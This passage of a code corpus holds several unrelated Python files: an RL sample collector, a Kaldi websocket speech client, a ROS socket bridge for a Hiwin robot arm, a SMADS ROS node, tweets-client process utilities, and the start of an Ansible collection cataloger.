mean_action, render, running_state, min_batch_size, max_reward, save_render, iter,env_rand):
if pid > 0:
torch.manual_seed(torch.randint(0, 5000, (1,)) * pid)
if hasattr(env, 'np_random'):
env.np_random.seed(env.np_random.randint(5000) * pid)
if hasattr(env, 'env') and hasattr(env.env, 'np_random'):
env.env.np_random.seed(env.env.np_random.randint(5000) * pid)
log = dict()
memory = Memory()
num_steps = 0
total_reward = 0
min_reward = max_reward
max_reward = -max_reward
total_c_reward = 0
min_c_reward = max_reward
max_c_reward = -max_reward
num_episodes = 0
total_e_reward = 0
min_e_reward = max_reward
max_e_reward = -max_reward
if save_render:
if not os.path.exists(f'assets/renders/episode_{iter}'):
os.mkdir(f'assets/renders/episode_{iter}')
while num_steps < min_batch_size:
state = env.reset()
if running_state is not None:
state = running_state(state)
reward_episode = 0
for t in range(10000):
state_var = tensor(state).unsqueeze(0)
with torch.no_grad():
if mean_action:
action = policy(state_var)[0][0].numpy()
else:
action = policy.select_action(state_var)[0].numpy()
action = int(action) if policy.is_disc_action else action.astype(np.float64)
step_heatmap = False
if num_episodes == 0:
step_heatmap = env.heatmap and (render or save_render)
elif render:
step_heatmap = ((num_episodes % render == 0) or save_render) and env.heatmap
next_state, reward, done, _ = env.step(action, step_heatmap=step_heatmap)
reward_episode += reward
total_e_reward += reward
min_e_reward = min(min_e_reward, reward)
max_e_reward = max(max_e_reward, reward)
if not save_render:
if running_state is not None:
next_state = running_state(next_state)
if custom_reward is not None:
discrim_reward = custom_reward(state, action)
reward = discrim_reward + reward
total_c_reward += discrim_reward
min_c_reward = min(min_c_reward, reward)
max_c_reward = max(max_c_reward, reward)
mask = 0 if done else 1
memory.push(state, action, mask, next_state, reward)
if done:
if save_render:
output_file = open(f'assets/renders/episode_{iter}/sample_{num_episodes}.mp4', 'wb')
env.render(output_file=output_file)
if render and num_episodes % render == 0:
env.render()
break
state = next_state
if save_render and num_episodes == 5:
return
# log stats
num_steps += (t + 1)
num_episodes += 1
total_reward += reward_episode
min_reward = min(min_reward, reward_episode)
max_reward = max(max_reward, reward_episode)
log['num_steps'] = num_steps
log['num_episodes'] = num_episodes
log['total_reward'] = total_reward
log['avg_reward'] = total_reward / num_episodes
log['max_reward'] = max_reward
log['min_reward'] = min_reward
log['total_e_reward'] = total_e_reward
log['avg_e_reward'] = total_e_reward / num_steps
log['max_e_reward'] = max_e_reward
log['min_e_reward'] = min_e_reward
if custom_reward is not None:
log['total_c_reward'] = total_c_reward
log['avg_c_reward'] = total_c_reward / num_steps
log['max_c_reward'] = max_c_reward
log['min_c_reward'] = min_c_reward
if queue is not None:
queue.put([pid, memory, log])
else:
return memory, log
def merge_log(log_list):
log = dict()
log['total_reward'] = sum([x['total_reward'] for x in log_list])
log['num_episodes'] = sum([x['num_episodes'] for x in log_list])
log['num_steps'] = sum([x['num_steps'] for x in log_list])
log['avg_reward'] = log['total_reward'] / log['num_episodes']
log['max_reward'] = max([x['max_reward'] for x in log_list])
log['min_reward'] = min([x['min_reward'] for x in log_list])
if 'total_c_reward' in log_list[0]:
log['total_c_reward'] = sum([x['total_c_reward'] for x in log_list])
log['avg_c_reward'] = log['total_c_reward'] / log['num_steps']
log['max_c_reward'] = max([x['max_c_reward'] for x in log_list])
log['min_c_reward'] = min([x['min_c_reward'] for x in log_list])
return log
class Agent:
def __init__(self, env, policy, device, custom_reward=None, value=None, running_state=None, num_threads=1, max_reward = 1e6, env_rand=2.0):
self.env = env
self.policy = policy
self.device = device
self.custom_reward = custom_reward
self.running_state = running_state
self.num_threads = num_threads
self.max_reward = max_reward
self.env_rand = env_rand
self.value = value
def collect_samples(self, min_batch_size, mean_action=False, render=0, use_multiprocessing=True, save_render=False, iter=None):
# use_multiprocessing avoids shadowing the imported multiprocessing module,
# which is needed below for Queue() and Process()
log = None
batch = None
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
if use_multiprocessing:
thread_batch_size = int(math.floor(min_batch_size / self.num_threads))
queue = multiprocessing.Queue()
workers = []
for i in range(self.num_threads-1):
# full positional argument list expected by the module-level collect_samples()
worker_args = (i+1, queue, self.env, self.policy, self.custom_reward, mean_action,
False, self.running_state, thread_batch_size, self.max_reward, save_render, iter, self.env_rand)
workers.append(multiprocessing.Process(target=collect_samples, args=worker_args))
for worker in workers:
worker.start()
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, thread_batch_size, self.max_reward, save_render, iter, self.env_rand)
worker_logs = [None] * len(workers)
worker_memories = [None] * len(workers)
for _ in workers:
pid, worker_memory, worker_log = queue.get()
worker_memories[pid - 1] = worker_memory
worker_logs[pid - 1] = worker_log
for worker_memory in worker_memories:
memory.append(worker_memory)
batch = memory.sample()
if self.num_threads > 1:
log_list = [log] + worker_logs
log = merge_log(log_list)
to_device(self.device, self.policy)
t_end = time.time()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
else:
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
if not save_render:
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, min_batch_size, self.max_reward, save_render, iter, self.env_rand)
to_device(self.device, self.policy)
t_end = time.time()
batch = memory.sample()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
else:
collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, min_batch_size, self.max_reward, save_render, iter, self.env_rand)
return batch, log
|
audio_client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde and Jonas Wacker'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import threading
import sys
import urllib
import Queue
import json
import time
import traceback
import os
from mutagen.mp3 import MP3
from bridge import KeywordClient
std_speaker = "You"
def rate_limited(max_per_second):
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
def rate_limited_function(*args, **kargs):
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
ret = func(*args, **kargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate
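# Illustrative-only sketch of the decorator above: calls to the wrapped function are spaced at
# least 1/max_per_second seconds apart (the function name below is hypothetical).
# @rate_limited(2)
# def ping():
#     print('ping')
# for _ in range(4):
#     ping()  # the four calls take roughly 1.5 seconds in total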
# Returns an audio file's bitrate and length in seconds if file is in mp3-format.
def get_audio_meta_data(path):
file_extension = os.path.splitext(path)[1] if (isinstance(path, str) and os.path.isfile(path)) else 'none'
meta_data = {'bitrate': 32000 * 8, 'length': 0}
if file_extension == '.mp3':
audio = MP3(path)
meta_data['bitrate'] = audio.info.bitrate
meta_data['length'] = audio.info.length
return meta_data
class KaldiClient(WebSocketClient):
def __init__(self, filename, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None, keyword_server_url='',
max_sentences=0):
super(KaldiClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.fn = filename
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
self.keyword_client = KeywordClient(keyword_server_url)
self.keyword_client.reset()
self.send_to_keywordserver = not (keyword_server_url == '')
if self.send_to_keywordserver:
self.keyword_client.addUtterance('', 'You')
self.last_hyp = ''
self.max_sentences = max_sentences
@rate_limited(4)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
# print "Socket opened!"
def send_data_to_ws():
f = open(self.fn, "rb")
if self.send_adaptation_state_filename is not None:
print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
print >> sys.stderr, "Failed to send adaptation state: ", e
for block in iter(lambda: f.read(self.byterate / 4), ""):
if self.maximum_sentences_reached():
break
self.send_data(block)
print >> sys.stderr, "Audio sent, now sending EOS"
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
# received decoding message from upstream Kaldi server
def received_message(self, m):
if self.maximum_sentences_reached():
return
try:
response = json.loads(str(m))
# print >> sys.stderr, "RESPONSE:", response
# print >> sys.stderr, "JSON was:", m
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']
if response['result']['final']:
if trans not in ['a.', 'I.', 'i.', 'the.', 'but.', 'one.', 'it.', 'she.']:
self.final_hyps.append(trans)
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.keyword_client.completeUtterance(trans, std_speaker)
self.keyword_client.addUtterance('', std_speaker)
self.last_hyp = ''
complete_transcript = '\n'.join(sentence[:-1] for sentence in self.final_hyps)
print u'\r\033[K', trans.replace(u'\n', u'\\n')
else:
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.last_hyp = trans
print_trans = trans.replace(u'\n', u'\\n')
print u'\r\033[K', print_trans
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
print u'Saving adaptation state to %s' % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, 'w') as f:
f.write(json.dumps(response['adaptation_state']))
else:
print u'Received error from server (status %d)' % response['status']
if 'message' in response:
print 'Error message:', response['message']
except Exception:
print 'Exception in received_message'
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=10, file=sys.stdout)
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout=timeout)
# Returns True if the maximum number of sentences defined by the user have been transcribed.
def maximum_sentences_reached(self):
return self.max_sentences != 0 and len(self.final_hyps) >= self.max_sentences
def closed(self, code, reason=None):
# print "Websocket closed() called"
# print >> sys.stderr
self.final_hyp_queue.put(" ".join(self.final_hyps))
def connect_ws(args):
content_type = args.content_type
if content_type == '' and args.audiofile.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1"\
% (args.rate / 2)
if args.rate == 0:
meta_data = get_audio_meta_data(args.audiofile)
args.rate = meta_data['bitrate'] / 8
print "No Bitrate provided. Setting Bitrate to: " + str(args.rate)
try:
ws = KaldiClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
byterate=args.rate, save_adaptation_state_filename=args.save_adaptation_state,
send_adaptation_state_filename=args.send_adaptation_state,
keyword_server_url=args.ambient_uri, max_sentences=args.count)
ws.connect()
while not ws.maximum_sentences_reached():
time.sleep(1)
except KeyboardInterrupt:
ws.close()
result = ws.get_full_hyp()
print result.encode('utf-8')
def main():
parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8100/client/ws/speech", dest="uri",
help="Server websocket URI")
parser.add_argument('-a', '--ambient-uri', default='http://localhost:5000/', dest='ambient_uri',
help='Ambient server websocket URI')
parser.add_argument('-r', '--rate', default=0, dest="rate", type=int,
help="Rate in bytes/sec at which audio should be sent to the server."
"NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('-n', '--sentence-number', default=0, dest="count", type=int,
help="Maximum number of sentences to transcribe.")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='',
help="Use the specified content type (empty by default,"
"for raw files the default is audio/x-raw, layout=(string)interleaved,"
"rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = main()
connect_ws(args)
|
HiwinRA605_socket_ros_test_20190625195912.py | #!/usr/bin/env python3
# license removed for brevity
#Receive commands from the strategy side and forward them to the control computer over a socket
import socket
##Multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #initial value of the transmitted data
Arm_feedback = 1 #assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: in Python 3.7+ a StopIteration raised inside a generator surfaces as RuntimeError
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
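# A short usage sketch (the command values and handler names are hypothetical) of the switch/case
# helper defined above; each case() call matches a value, and an argument-less case() is the default.
# for case in switch(command):
#     if case('start'):
#         start()
#         break
#     if case('stop'):
#         stop()
#         break
#     if case():  # default branch
#         print('unknown command')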
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ##receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('Press 1 to start transmission, press 3 to exit: ')) #input the start command
start_input = 1
if start_input==1:
while 1:
##---------------socket: send arm commands-----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##reset to the initial mode state
s.send(data.encode('utf-8'))#socket send: encode the str before transmission
Socket_sent_flag = True
feedback_str = s.recv(1024)
#the arm side reports its state
if str(feedback_str[2]) == '70':# F: the arm is in the Ready state, ready to accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T: the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6: the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket: send arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## Multithreading
def thread_test():
socket_client()
## Multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##reset to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the thread
socket_server()
t.join()
# Ctrl+K Ctrl+C Add line comment
# Ctrl+K Ctrl+U Remove line comment
#Ctrl+] / [ Indent/outdent line |
smads_endpoints_node.py | #!/usr/bin/env python3
import rospy
import threading
from enum import Enum
from smads_core.client import JackalClient
from smads_core.client import SpotClient
from smads_core.client import RobotClient
from smads_core.interface import RobotSensorInterface
from smads_core.interface import RobotNavigationInterface
class RobotType:
SPOT = 1
JACKAL = 2
platform_map = {
SPOT : SpotClient(),
JACKAL : JackalClient(),
}
class SMADSROS:
def __init__(self, client, sensor_poll_rate, robot_prefix="smads_platform"):
self.client = client
self.robot_prefix = robot_prefix
self.client_mutex = threading.Lock()
self.sensor_interface = RobotSensorInterface(client, self.client_mutex, sensor_poll_rate, robot_prefix)
self.navigation_interface = RobotNavigationInterface(client, self.client_mutex, robot_prefix)
def start(self):
x = threading.Thread(target=self.sensor_interface.start)
y = threading.Thread(target=self.navigation_interface.start)
x.start()
y.start()
rospy.spin()
if __name__ == '__main__':
try:
rospy.init_node('smads_ros_node', anonymous=False)
platform = rospy.get_param("~platform", RobotType.JACKAL)
client = RobotType.platform_map[platform]
platform_prefix = rospy.get_param("~platform_prefix", "smads_platform")
poll_rate = rospy.get_param("~sensor_poll_rate", 10)
smadsros = SMADSROS(client, poll_rate, platform_prefix)
smadsros.start()
except rospy.ROSInterruptException:
pass
|
utils.py | #!/user/bin/env python
import time
import datetime
import threading
import sys
import os
import re
import signal
import copy
import six
from traceback import print_exception
import logbook
from pystalkd.Beanstalkd import Connection
import anyjson
import tweetsclient
def dict_mget(subject, *keys, **kwargs):
curr = subject
for k in keys:
try:
if k in curr:
curr = curr[k]
else:
return None
except TypeError:
return None
return curr
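# Usage sketch (hypothetical data) for dict_mget: it walks nested dictionaries by key and
# returns None instead of raising when a key or level is missing.
# conf = {'twitter': {'auth': {'token': 'abc'}}}
# dict_mget(conf, 'twitter', 'auth', 'token')     # -> 'abc'
# dict_mget(conf, 'twitter', 'missing', 'token')  # -> None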
def replace_highpoints(subject, replacement=u'\ufffd'):
try:
return re.sub(u'[\U00010000-\U0010ffff]', replacement, subject, flags=re.U)
except re.error:
return re.sub(u'[\uD800-\uDBFF][\uDC00-\uDFFF]', replacement, subject, flags=re.U)
def beanstalk(host='localhost', port=11300, watch=None, use=None):
beanstalk = Connection(host=host, port=port)
if use:
beanstalk.use(use)
if watch:
beanstalk.watch(watch)
return beanstalk
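# Connection sketch (host and tube names are hypothetical): the helper optionally selects a tube
# to use for producing and a tube to watch for consuming before returning the connection.
# queue = beanstalk(host='localhost', port=11300, use='tweets', watch='tweets')
# queue.put('{"id": 1}')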
def configure_log_handler(application_name, loglevel, output):
if isinstance(loglevel, (str, six.string_types)):
loglevel = getattr(logbook, loglevel.upper())
if not isinstance(loglevel, int):
raise TypeError("configure_log_handler expects loglevel to be either an integer or a string corresponding to an integer attribute of the logbook module.")
if output == 'syslog':
log_handler = logbook.SyslogHandler(
application_name=application_name,
facility='user',
bubble=False,
level=loglevel)
elif output == '-' or not output:
log_handler = logbook.StderrHandler(
level=loglevel,
bubble=False)
else:
log_handler = logbook.FileHandler(
filename=output,
encoding='utf-8',
level=loglevel,
bubble=False)
return log_handler
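# Example wiring (argument values are assumed, not prescribed): build a handler from a string
# loglevel and bind it so subsequent logbook calls in this application are routed through it.
# handler = configure_log_handler('tweets-client', 'INFO', '-')
# with handler.applicationbound():
#     logbook.info('logging configured')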
def run_with_restart(fn, max_restart=0, args=(), kwargs={}):
restartCounter = 0
while True:
try:
return fn(*args, **kwargs)
except AssertionError:
raise
except Exception as e:
logbook.error("Unhandled exception of type {exctype}: {exception}",
exctype=type(e),
exception=str(e))
restartCounter += 1
if max_restart and restartCounter > max_restart:
logbook.critical("Already restarted {nth} times. Exiting.",
nth=restartCounter)
return
else:
# Sleep longer each time we restart, but no more than 5 minutes
delay = min(restartCounter * 15, 300)
logbook.error("Restarting for {nth} time in {sec} seconds.",
nth=restartCounter,
sec=delay)
time.sleep(delay)
def restart_process(signum, frame):
"""
Replaces the current process with a new process invoked
using the same command line.
"""
os.execl(sys.executable, sys.executable, *sys.argv)
def start_heartbeat_thread(heart):
"""
Triggers a regular heartbeat from a background thread
for scripts that make blocking calls and thus can't
heartbeat from their main loop.
"""
def _heartbeat():
while True:
heart.sleep()
heart.beat()
heartbeat = threading.Thread(target=_heartbeat)
# This causes the heartbeat thread to die with the main thread
heartbeat.daemon = True
heartbeat.start()
def start_watchdog_thread(heart):
"""
Watch a heartbeat file and restart when the file mtime is either
too old or too far in the future.
"""
def _watchdog():
while True:
time.sleep(heart.interval.total_seconds() * 0.10)
try:
stat = os.stat(heart.filepath)
mtime = datetime.datetime.fromtimestamp(stat.st_mtime)
except OSError as e:
if e.errno == 2: # No such file or directory
logbook.warning("Heartbeat file disappeared, restarting via SIGHUP.")
os.kill(heart.pid, signal.SIGHUP)
return
else:
raise
now = datetime.datetime.now()
if mtime >= now:
logbook.warning("Heartbeat file mtime is in the future, restarting via SIGHUP.")
os.kill(heart.pid, signal.SIGHUP)
return
watchdog = threading.Thread(target=_watchdog)
# This causes the watchdog thread to die with the main thread
watchdog.daemon = True
watchdog.start()
class Heart(object):
"""
Updates the access and modification timestamp of a
file every `interval` seconds.
"""
def __init__(self):
self.last_beat = datetime.datetime.now()
config = tweetsclient.Config().get()
try:
self.interval = datetime.timedelta(seconds=float(config.get('tweets-client', 'heartbeat_interval')))
except:
logbook.warning("No heartbeat_interval configuration parameter, skipping heartbeat.")
raise StopIteration
try:
directory = config.get('tweets-client', 'heartbeats_directory')
except:
logbook.warning("No heartbeats_directory configuration parameter, skipping heartbeat.")
raise StopIteration
if not os.path.isdir(directory):
logbook.warning("The heartbeats_directory parameter ({0}) is not a directory.",
directory)
raise StopIteration
scriptname = os.path.basename(sys.argv[0])
self.filepath = os.path.join(directory, scriptname)
start_time = datetime.datetime.now().isoformat()
self.pid = os.getpid()
with open(self.filepath, 'w') as fil:
fil.write(anyjson.serialize({
'pid': self.pid,
'started': start_time
}))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if ((exc_type, exc_value, traceback) == (None, None, None)) or (exc_type is KeyboardInterrupt):
os.unlink(self.filepath)
else:
with open(self.filepath, 'w') as outf:
print_exception(exc_type, exc_value, traceback, 1000, outf)
def sleep(self):
while True:
now = datetime.datetime.now()
since = now - self.last_beat
if since >= self.interval:
return
else:
time.sleep(self.interval.total_seconds() * 0.10)
def beat(self):
now = datetime.datetime.now()
since = now - self.last_beat
if since >= self.interval:
os.utime(self.filepath, None)
self.last_beat = now
return True
else:
return False
|
catalog_collections.py | """catalog collections
"""
import argparse
import hashlib
import json
import multiprocessing
import os
import re
import subprocess
import sys
from collections import Counter
from collections import OrderedDict
from datetime import datetime
from glob import glob
from json.decoder import JSONDecodeError
from typing import Dict
from typing import List
from typing import Tuple
import yaml
from ansible.utils.plugin_docs import get_docstring # type: ignore
from yaml.error import YAMLError
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader # type: ignore
# pylint: disable=import-error
from key_value_store import KeyValueStore # type: ignore
# pylint: enable=import-error
PROCESSES = (multiprocessing.cpu_count() - 1) or 1
class CollectionCatalog:
# pylint: disable=too-few-public-methods
"""collection cataloger"""
def __init__(self, directories: List[str]):
"""Initialize the collection cataloger.
:param directories: A list of directories that may contain collections
"""
self._directories = directories
self._collections: OrderedDict[str, Dict] = OrderedDict()
self._errors: List[Dict[str, str]] = []
self._messages: List[str] = []
def _catalog_plugins(self, collection: Dict) -> None:
# pylint: disable=too-many-locals
"""catalog the plugins within a collection"""
path = collection["path"]
file_chksums = {}
file_manifest_file = collection.get("file_manifest_file", {}).get("name")
if file_manifest_file:
fpath = f"{path}/{file_manifest_file}"
if os.path.exists(fpath):
with open(file=fpath, encoding="utf-8") as read_file:
try:
loaded = json.load(read_file)
file_chksums = {v["name"]: v for v in loaded["files"]}
except (JSONDecodeError, KeyError) as exc:
self._errors.append({"path": fpath, "error": str(exc)})
exempt = ["action", "module_utils", "doc_fragments"]
plugin_directory = os.path.join(path, "plugins")
if os.path.isdir(plugin_directory):
plugin_dirs = [
(f.name, f.path)
for f in os.scandir(plugin_directory)
if f.is_dir() and f.name not in exempt
]
for plugin_type, path in plugin_dirs:
if plugin_type == "modules":
plugin_type = "module"
for (dirpath, _dirnames, filenames) in os.walk(path):
self._process_plugin_dir(
plugin_type,
filenames,
file_chksums,
dirpath,
collection,
)
@staticmethod
def _generate_chksum(file_path: str, relative_path: str) -> Dict:
"""generate a std checksum for a file"""
sha256_hash = hashlib.sha256()
with open(file_path, "rb") as fhand:
for byte_block in iter(lambda: fhand.read(4096), b""):
sha256_hash.update(byte_block)
res = {
"name": relative_path,
"ftype": "file",
"chksum_type": "sha256",
"chksum_sha256": sha256_hash.hexdigest(),
"format": 1,
}
return res
def _process_plugin_dir(
self,
plugin_type: str,
filenames: List,
file_chksums: Dict,
dirpath: str,
collection: Dict,
) -> None:
# pylint: disable=too-many-arguments
"""process each plugin within one plugin directory"""
for filename in filenames:
file_path = f"{dirpath}/{filename}"
relative_path = file_path.replace(collection["path"], "")
_basename, extension = os.path.splitext(filename)
if not filename.startswith("__") and extension == ".py":
chksum_dict = file_chksums.get(relative_path)
if not chksum_dict:
chksum_dict = self._generate_chksum(file_path, relative_path)
chksum = chksum_dict[f"chksum_{chksum_dict['chksum_type']}"]
collection["plugin_chksums"][chksum] = {"path": relative_path, "type": plugin_type}
def _one_path(self, directory: str) -> None:
"""process the contents of an <...>/ansible_collections/ directory"""
for directory_path in glob(f"{directory}/*/*/"):
manifest_file = f"{directory_path}/MANIFEST.json"
galaxy_file = f"{directory_path}/galaxy.yml"
